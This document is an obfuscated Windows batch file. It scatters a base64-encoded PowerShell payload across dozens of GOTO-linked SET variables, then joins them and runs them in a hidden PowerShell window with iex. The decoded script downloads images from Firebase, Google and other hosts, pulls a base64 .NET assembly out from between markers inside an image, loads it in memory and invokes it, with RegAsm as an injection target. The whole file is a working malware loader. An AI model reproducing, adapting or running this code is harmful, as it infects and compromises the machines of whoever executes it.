@echo off
GOTO DOOFGIGIND
:DGIOKGGSHN
SET IDNFFNDSID=hAEYAcgBvAG0ATABpAG4AawBzACAAewAgAHAAYQByAGEAbQAgACgAWwBzAHQAcgBpAG4AZwBbAF0AXQ
GOTO HNONNNNDHD
:GKONHOGSGU
SET OJKNSONDIK=BkAGUAeABPAGYAKAAkAHMAdABhAHIAdABGAGwAYQBnACkAOwAgAA0ACgAgACAAIAAgACAAIAAgACA
GOTO JFNNDFDUDD
:SONDSGIDSH
SET NDDFNDFOFF=BTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzAA0ACgAgACAAIAAgACAAIAAgACAA
GOTO GNFFOJFOFF
:NNUGNDFNUJ
SET NIOJGJINNG=ABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADo
GOTO IDIKSDOFOG9
:DNOFIGSKKJ
SET GGFOOONODN=ANgA0ACcAKQApAH0AfQA='';$oWjfdsuxd = [system.Text.encoding]:
GOTO GOGOHSGGOG8
:FKGNUIOODD
SET GIGGFOHISO=AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABzAGgAdQBm
GOTO DDIGUNHIFG5
:KFNHDNIOII
SET GFGSFIDIGI=ZgBzAGQAZwAgACsAIAAnAGEAdQA3ADIAbgB1AHgAegB2ADIALgB1AGYAcwAuAHMAaAAvAGYALwA0A
GOTO DFNNDJOOFJ7
:NIUGNOGIOS
SET JHIOIUISDD=CQAZQBuAGQASQBuAGQAZQB4ACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlA
GOTO SNGODSDIFD3
:SNGODSDIFD
SET OGDFGNDGNI=BjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBj
GOTO NOKGOJNGNG
:SONDSGIDSH3
SET JFIFJNNGDD=AEIAeQB0AGUAcwAgAC0AbgBlACAAJABuAHUAbABsACkAIAB7ACAAJABpAG0AYQBnA
GOTO SONDSGIDSH4
:FJDJGSNIHS
SET JGIOSHHGUN=ASQBuAGQAZQB4AE8AZgAoACQAZQBuAGQARgBsAGEAZwApADsADQAKACAAIAAgACAAIAAgACAA
GOTO HHOFONFKUJ
:IFOONUNIFF
SET DIKDJNKFFO=AgACAAIAAgACAAIAAgACQAbABmAHMAZABmAHMAZABnACAAPQAgACAAJABCAH
GOTO KFDDUOIGGN8
:ONNGFFJIFI
SET OJOISNDIFS=AdABPAGIAagBlAGMAdAAgACQAbABpAG4AawBzACAALQBDAG8AdQBuAHQAIAAkAGwAaQBuAGsAcwAuAE
GOTO GJGNDDNDHD
:GOGOHSGGOG
SET DNDNOOKNFH=ACAAIAAgACAAIAAgACAAIAAgAGYAdQBuAGMAdABpAG8AbgAgAEQAbwB3AG4AbABvAGEAZABEAGEAdAB
GOTO DGIOKGGSHN
:SGINGOOJGO
SET NFOJJNUGGG=7ACAAJABzAHQAYQByAHQASQBuAGQAZQB4ACAAKwA9ACAAJABzAHQAYQByAHQAR
GOTO KIGDOIGDNS
:SONDSGIDSH5
SET OFOHHFINJO=G8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGkAbQBhAGcAZ
GOTO SONDSGIDSH6
:IOGSFDIUGD
SET ISSGOKDOUF=JABuAHUAbABsACAAfQA7ACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIA
GOTO KFDDUOIGGN4
:KFDDUOIGGN
SET FSGGKDNOOD=xe -WindowStyle Hidden -ArgumentList '-Command \"$ddsdgo = ''DQAKACAAIA
GOTO DFNNDJOOFJ
:NIONNJDIGS
SET FOOIGFFKIN=AIAAkAHQAeQBwAGUAIAA9ACAAJABsAG8AYQBkAGUAZABBAHMAcwBlAG0AYgBsAHkALgBHAGUAdA
GOTO NOKGOJNGNG3
:SNGODSDIFD0
SET DDNJDDIGKD=vAG0AbQBhAG4AZAApADsAIAAgACAAJABlAG4AZABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQB
GOTO SNGODSDIFD1
:SONDSGIDSH6
SET GGOOSDFFIN=QBCAHkAdABlAHMAKQA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAA
GOTO SONDSGIDSH7
:SUDDDFHHIU
SET GNOJNGGJGN=ACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAAfAAgAFMAbwByAHQALQBPAGIAa
GOTO UINDNKIGIJ
:NNKFGNOONO
SET OHDINDDISJ=AIAAgACAAIAAgACAAIAAgACAAIAAgACQAYgBhAHMAZQA2ADQATABlAG4AZwB0AGg
GOTO FIHNONJGGD
:SNGODSDIFD7
SET OIJFFGGGIS=ACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQ
GOTO SNGODSDIFD8
:GOGOHSGGOG3
SET HNDJIIGOSJ=AgAFsAbwBiAGoAZQBjAHQAWwBdAF0AIAAoACcAdAB4AHQALgBkAHIAZQBuAC8AbgBpAGEAbQAvAHM
GOTO GOGOHSGGOG4
:JUDFODGGJN
SET SNGDJGIDFD=dABvAGsAZQBuAD0AYgBkADIANQBiADYAZQAwAC0ANABiADkAMwAtADQAOQBhAGQ
GOTO DFNNDJOOFJ5
:SNGODSDIFD8
SET GDJSJDJIHD=ALQBQAHIAbwBjAGUAcwBzACAAfAAgAFMAbwByAHQALQBPAGIAagBlAGMAdAAgAEMAUABVACAALQBEA
GOTO SNGODSDIFD9
:DFNNDJOOFJ
SET GGJINOIKGG=AgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABTAHQAYQByAHQALQ
GOTO SONDSGIDSH
:GJGNDDNDHD
SET SGNNSSIGIG=wAZQBuAGcAdABoADsAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC
GOTO DNNSGGDSGN
:SNGODSDIFD1
SET OFDNFGJDSO=nAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAGUAbgBkAEYAbABhAGcAKQA7ACAAIAAgA
GOTO NIUGNOGIOS
:DFNNDJOOFJ0
SET JDOOGGUOIS=HMAZABnACAAKwAgACcAZgBpAHIAZQBiAGEAcwBlAHMAdABvAHIAYQBnAGUALgBnA
GOTO DFNNDJOOFJ1
:SNGODSDIFD9
SET ONDGGJKINN=GUAcwBjAGUAbgBkAGkAbgBnACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEYAaQ
GOTO NOKGOJNGNG0
:KFDDUOIGGN4
SET SDSIGIOJGD=AgACAAIAAgACAAIAAkAEIAeQB0AGUAcwAgAD0AIAAnAGgAdAB0AHAAJwA7AA0AC
GOTO KFDDUOIGGN5
:UINDNKIGIJ
SET OHNFFGJJDF=gBlAGMAdAAgAEMAUABVACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnACAAfAAgAFMAZQBsAGUA
GOTO NOKGOJNGNG7
:SONDSGIDSH2
SET KGSNDDDJGO=ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBtAGEAZwBl
GOTO SONDSGIDSH3
:KFDDUOIGGN9
SET IGFJHGDFOO=AAIAAgACAAIAAgACAAIAAgACQAbABpAG4AawBzACAAPQAgAEAAKAAoACQAbABmAHMAZABmA
GOTO DFNNDJOOFJ0
:OFDSSIFUGN
SET OGFHGGJGUH=ACAAIAAkAHcAZQBiAEMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoA
GOTO GGDIDSFDIS
:NOKGOJNGNG
SET HGNDFFDOHI=AG8AbABUAHkAcABlAF0AOgA6AFQAbABzADEAMgANAAoAIAAgACAAIAAgACAAIAAgACAAIAAg
GOTO GOGOHSGGOG
:SONDSGIDSH1
SET NDNNNGFIGJ=QBMAGkAbgBf#AHMAIAAkAGwAaQBuAGsAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAg
GOTO SONDSGIDSH2
:SONDSGIDSH9
SET IINFIDDOOD=BuAGQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgAnADsAIAAk
GOTO GKDFJFUGDD
:SONDSGIDSH4
SET USDFGFNDGI=GUAVABlAHgAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjA
GOTO SONDSGIDSH5
:GGFODINNGO
SET GHFNGFDIIH=NAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAGEAcwB
GOTO FJNJDDNGFN
:HGONDIDIDG
SET IJGDJDNOFO=TAHUAYgBzAHQAcgBpAG4AZwAoACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAsACAAJABiAGEAcwB
GOTO IDIKSDOFOG4
:KFDDUOIGGN6
SET ODNIDDOGUD=dABlAHMAMgAgAD0AIAAnAHMAOgAvAC8AJwA7AA0ACgAgACAAIAAgACAAIAAgACAAIA
GOTO IFOONUNIFF
:DFNNDJOOFJ3
SET NGOSNIDGJO=vAC8AZgBvAHIAcwB0ACUAMgBGAHAAaQBjADkALgBqAHAAZwA/AGEAbAB0AD0AbQBlAGQAaQBhACYA
GOTO JUDFODGGJN
:FJNJDDNGFN
SET IGFOFDDDOK=lADYANABDAG8AbQBtAGEAbgBkACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgB
GOTO HGONDIDIDG
:GOUHNGSHDN
SET GFFOGOJIGD=AZgBmAGwAZQBkAEwAaQBuAGsAcwApACAAewAgAHQAcgB5ACAAewAgAHIAZQB0AHUAcgBuACAAJAB3AG
GOTO KFDDUOIGGN0
:FIHNONJGGD
SET DKFGIDGIFG=AaAAgAD0AIAAkAGUAbgBkAEkAbgBkAGUAeAAgAC0AIAAkAHMAdABhAHIAdABJAG4AZABlAHgAOwA
GOTO GGFODINNGO
:DFNNDJOOFJ1
SET FGOIDJFOOI=G8AbwBnAGwAZQBhAHAAaQBzAC4AYwBvAG0ALwB2ADAALwBiAC8AaABvAGwAZAAtADgAZgBhAG
GOTO DFNNDJOOFJ2
:NOKGOJNGNG9
SET HUIGOUIOFF=gACAAIAAgACAAIAAkAGkAbgBqAGUAYwA9ACcAUgBlAGcAJwAgACsAIAAnAEEAcwBt
GOTO GOGOHSGGOG0
:NOKGOJNGNG1
SET FFNJJFFGIG=AQwBQAFUADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACA
GOTO NIONNJDIGS
:DFNNDJOOFJ5
SET JNGGOGDFIK=ALQA5AGUAMgA4AC0ANQBmAGIAMQA4ADIAMQBjAGIAMgBhAGYAJwApACwAKAAkAGwAZgBzAGQA
GOTO KFNHDNIOII
:KFDDUOIGGN8
SET NFGDDGDDDD=kAdABlAHMAIAAf#ACQAQgB5AHQAZQBzADIAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgAC
GOTO KFDDUOIGGN9
:DNNSGGDSGN
SET OJJHDGDNNF=AAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAbABpAG4AawAgAGkAbgAgACQAcwBoAHU
GOTO GOUHNGSHDN
:KFDDUOIGGN0
SET NGJIFIKDDO=UAYgBDAGwAaQBlAG4AdAAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABsAGkAbgBf#A
GOTO KFDDUOIGGN1
:KFDDUOIGGN5
SET NGIUIKGSUI=gAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABCAHkA
GOTO KFDDUOIGGN6
:DGIOKGGSHN2
%FGODUNFFND%%GNNGFSFDID%%FSGGKDNOOD%%GGJINOIKGG%%NDDFNDFOFF%%GNSGGGUJIG%%DJGOSOFOJJ%%OGDFGNDGNI%%HGNDFFDOHI%%DNDNOOKNFH%%IDNFFNDSID%%GDFDUNDGOJ%%OGFHGGJGUH%%FJUOIDNGGF%%GIGGFOHISO%%FDGNGJFDIK%%OJOISNDIFS%%SGNNSSIGIG%%OJJHDGDNNF%%GFFOGOJIGD%%NGJIFIKDDO%%DIUFNFDKIG%%JKIOSUGDGD%%ISSGOKDOUF%%SDSIGIOJGD%%NGIUIKGSUI%%ODNIDDOGUD%%DIKDJNKFFO%%NFGDDGDDDD%%IGFJHGDFOO%%JDOOGGUOIS%%FGOIDJFOOI%%HKGFDNGJGJ%%NGOSNIDGJO%%SNGDJGIDFD%%JNGGOGDFIK%%GFGSFIDIGI%%NIKGJFOUFD%%IIFGJIIGFH%%SFKIIGDOJU%%FFGIUOJIII%%NDNNNGFIGJ%%KGSNDDDJGO%%JFIFJNNGDD%%USDFGFNDGI%%OFOHHFINJO%%GGOOSDFFIN%%NDGJDFKGDS%%ISUDIDGJFJ%%IINFIDDOOD%%NJDKHJFGGN%%OJKNSONDIK%%FKNSGNNONN%%JDFFSGFGGG%%DDNIUJDDJF%%KDODNNNHJJ%%IODNOFNGFF%%NFOJJNUGGG%%SFNNDJHDOD%%OHDINDDISJ%%DKFGIDGIFG%%GHFNGFDIIH%%IGFOFDDDOK%%IJGDJDNOFO%%OFDJNNDGOG%%FGGDDFGDGG%%JGIOSHHGUN%%DIDOSDNGSO%%NIOJGJINNG%%OOFGFDGJHI%%DDNJDDIGKD%%OFDNFGJDSO%%JHIOIUISDD%%OIOIHKOKNG%%IGGFNNNJJF%%DNJGIGJFJI%%NGJDDNFNOS%%OIJFFGGGIS%%GDJSJDJIHD%%ONDGGJKINN%%FNNFGSUGDH%%FFNJJFFGIG%%FOOIGFFKIN%%HNIUGSDGHI%%OUDNHOFFSN%%GNOJNGGJGN%%OHNFFGJJDF%%INFFFNFNOK%%UOGIOONJFD%%HUIGOUIOFF%%DGFJJFODSO%%FDGIIGOGGN%%DNGNDGOJGO%%HNDJIIGOSJ%%DDDSNDDFIJ%%NFDNIJJKNF%%GOFIGIFNNS%%GGFOOONODN%%GNJGJDDFDG%%OUFNSGDGSJ%%GDNGDFGGSG%
GOTO DGIOKGGSHN3
:HHOFONFKUJ
SET DIDOSDNGSO=IAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAYwBvAG0AbQBhAG4AZABCAHkAd
GOTO NNUGNDFNUJ
:KFDDUOIGGN2
SET JKIOSUGDGD=NAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAA
GOTO IOGSFDIUGD
:NOKGOJNGNG0
SET FNNFGSUGDH=ByAHMAdAAgADUAIAB8ACAARgBvAHIAbQBhAHQALQBUAGEAYgBsAGUAIABOAGEAbQBlACw
GOTO NOKGOJNGNG1
:SONDSGIDSH0
SET FFGIUOJIII=GcAZQBCAHkAdABlAHMAIAA9ACAARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEARgByAG8Ab
GOTO SONDSGIDSH1
:GOGOHSGGOG1
SET FDGIIGOGGN=IAAgACQAbQBlAHQAaABvAGQAIAA9ACAAJAB0AHkAcABlAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAH
GOTO GOGOHSGGOG2
:DGIOKGGSHN0
                    
GOTO DGIOKGGSHN1
:DFNNDJOOFJ8
SET IIFGJIIGFH=AMgAxAHAAagBaAEQATABkADAARQBLADQAOQBuADcAWABnAEgAeAAnACkAKQA7ACAAIAAgACA
GOTO DFNNDJOOFJ9
:GDKGDNDKJD
SET JDFFSGFGGG=UAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAGUAbgBkAEYAbABhAGcAKQA7AA0ACg
GOTO GIIGFIOIDF
:GOGOHSGGOG4
SET DDDSNDDFIJ=AZABhAGUAaAAvAHMAZgBlAHIALwA3ADMAMwAxAC8AOAAyADcANAA2ADIAMwA4ADIAMwAxAC8AbQBvAG
GOTO GOGOHSGGOG5
:DGIOKGGSHN1
SET GDNGDFGGSG=  
GOTO DGIOKGGSHN2
:DOOFGIGIND
SET FGODUNFFND=%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\powershell.exe -Comm
GOTO DDIGUNHIFG
:GOGOHSGGOG2
SET DNGNDGOJGO=IAdQBuAHMAJwAgACsAIAAnAHMAJwApAC4ASQBuAHYAbwBf#AGUAKAAkAG4AdQBsAGwALA
GOTO GOGOHSGGOG3
:KFDDUOIGGN1
SET DIUFNFDKIG=CkAIAB9ACAAYwBhAHQAYwBoACAAewAgAGMAbwBuAHQAaQBuAHUAZQAgAH0AIAB9ADsAIAA
GOTO KFDDUOIGGN2
:HNONNNNDHD
SET GDFDUNDGOJ=AkAGwAaQBuAGsAcwApACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAg
GOTO OFDSSIFUGN
:SNGODSDIFD6
SET NGJDDNFNOS=QQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBz
GOTO SNGODSDIFD7
:SNGODSDIFD5
SET DNJGIGJFJI=tAGIAbAB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4A
GOTO SNGODSDIFD6
:IDIKSDOFOG
SET DJGOSOFOJJ=UABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbw
GOTO SNGODSDIFD
:IDIKSDOFOG9
SET OOFGFDGJHI=ARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgBhAHMAZQA2ADQAQwB
GOTO SNGODSDIFD0
:DFNNDJOOFJ2
SET HKGFDNGJGJ=QANQAuAGYAaQByAGUAYgBhAHMAZQBzAHQAbwByAGEAZwBlAC4AYQBwAHAALwB
GOTO DFNNDJOOFJ3
:KIGDOIGDNS
SET SFNNDJHDOD=gBsAGEAZwAuAEwAZQBuAGcAdABoADsAIAANAAoAIAAgACAAIAAgACAAIAAgACA
GOTO NNKFGNOONO
:GIIGFIOIDF
SET DDNIUJDDJF=AgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABpAGYAI
GOTO GNNKNONDGK
:GOGOHSGGOG5
SET NFDNIJJKNF=MALgB0AG4AZQB0AG4AbwBjAHIAZQBzAHUAYgB1AGgAdABpAGcALgB3AGEAcgAvAC8AOgBzACcA
GOTO GOGOHSGGOG6
:GOGOHSGGOG9
SET OUFNSGDGSJ=::Replace($ddsdgo, ''f#'', ''r'')));iex $oWjfdsuxd\"'"
GOTO DGIOKGGSHN0
:GOGOHSGGOG0
SET DGFJJFODSO=ACcAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAA
GOTO GOGOHSGGOG1
:IDIKSDOFOG4
SET OFDJNNDGOG=lADYANABMAGUAbgBnAHQAaABoACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACA
GOTO IDIKSDOFOG5
:GOGOHSGGOG6
SET GOFIGIFNNS=LAAgACcAMAAnACwAIAAnACcALAAgACQAaQBuAGoAZQBjACwAIAAnADAAJwAgACwAIAAnAHg
GOTO DNOFIGSKKJ
:SNGODSDIFD3
SET OIOIHKOKNG=HgATwBmACgAJABlAG4AZABGAGwAYQBnACkAOwANAAoAIAAgACAAIAAgACAAIAAg
GOTO SNGODSDIFD4
:SNGODSDIFD4
SET IGGFNNNJJF=ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAbABvAGEAZABlAGQAQQBzAHMAZQB
GOTO SNGODSDIFD5
:DFNNDJOOFJ7
SET NIKGJFOUFD=EwAaABWADUAQgAxAHMARABDAHcASQBZAFcAVwBVAFoAUQBwAGIAUwBBAFYAdwBZAEYAOABRAHI
GOTO DFNNDJOOFJ8
:GDNNDIFGNO
SET IODNOFNGFF=kAbgBkAGUAeAAgAC0AZwB0ACAAJABzAHQAYQByAHQASQBuAGQAZQB4ACkAIAB
GOTO SGINGOOJGO
:JFNNDFDUDD
SET FKNSGNNONN=AIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABlAG4AZABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAG
GOTO GDKGDNDKJD
:GGDIDSFDIS
SET FJUOIDNGGF=ZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAg
GOTO FKGNUIOODD
:IDIKSDOFOG5
SET FGGDDFGDGG=AIAAgACAAIAAkAGUAbgBkAEkAbgBkAGUAeAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4
GOTO FJDJGSNIHS
:NOKGOJNGNG3
SET HNIUGSDGHI=BUAHkAcABlACgAJwBtAHkAcAByAG8AZwByAGEAbQAuAEgAbwBtAGUAZQBzACcA
GOTO NOKGOJNGNG4
:DDIGUNHIFG
SET GNNGFSFDID=and "Start-Process %SYSTEMROOT%\System32\WindowsPowerShell\v1.0\powershell.e
GOTO KFDDUOIGGN
:GKDFJFUGDD
SET NJDKHJFGGN=AHMAdABhAHIAdABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbg
GOTO GKONHOGSGU
:GNNKNONDGK
SET KDODNNNHJJ=AAoACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIAAkAGUAbgBkAE
GOTO GDNNDIFGNO
:NOKGOJNGNG8
SET UOGIOONJFD=GEAYgBsAGUAIABOAGEAbQBlACwAQwBQAFUADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAA
GOTO NOKGOJNGNG9
:NOKGOJNGNG7
SET INFFFNFNOK=YwB0AC0ATwBiAGoAZQBjAHQAIAAtAEYAaQByAHMAdAAgADUAIAB8ACAARgBvAHIAbQBhAHQALQBUA
GOTO NOKGOJNGNG8
:SONDSGIDSH7
SET NDGJDFKGDS=IAAgACAAIAAgACAAIAAkAHMAdABhAHIAdABGAGwAYQBnACAAPQAgACcAPAA8AEIAQ
GOTO SONDSGIDSH8
:DFNNDJOOFJ9
SET SFKIIGDOJU=AIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAbQBhA
GOTO SONDSGIDSH0
:SONDSGIDSH8
SET ISUDIDGJFJ=QAnACAAKwAgACcAUwBFACcAIAAf#ACAAJwA2ADQAXwBTAFQAQQBSAFQAPgA+ACcAOwAgACQAZQ
GOTO SONDSGIDSH9
:GNFFOJFOFF
SET GNSGGGUJIG=IAAgACAAIAAgACAAIAAgACAAIAAgACAAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUA
GOTO IDIKSDOFOG
:NOKGOJNGNG4
SET OUDNHOFFSN=KQA7AA0ACgANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAg
GOTO SUDDDFHHIU
:GOGOHSGGOG8
SET GNJGJDDFDG=:Unicode.GetString([system.convert]::Frombase64string([regex]
GOTO GOGOHSGGOG9
:DDIGUNHIFG5
SET FDGNGJFDIK=AGYAbABlAGQATABpAG4AawBzACAAPQAgAEcAZQB0AC0AUgBhAG4AZABvAG0AIAAtAEkAbgBwAHU
GOTO ONNGFFJIFI
:DGIOKGGSHN3
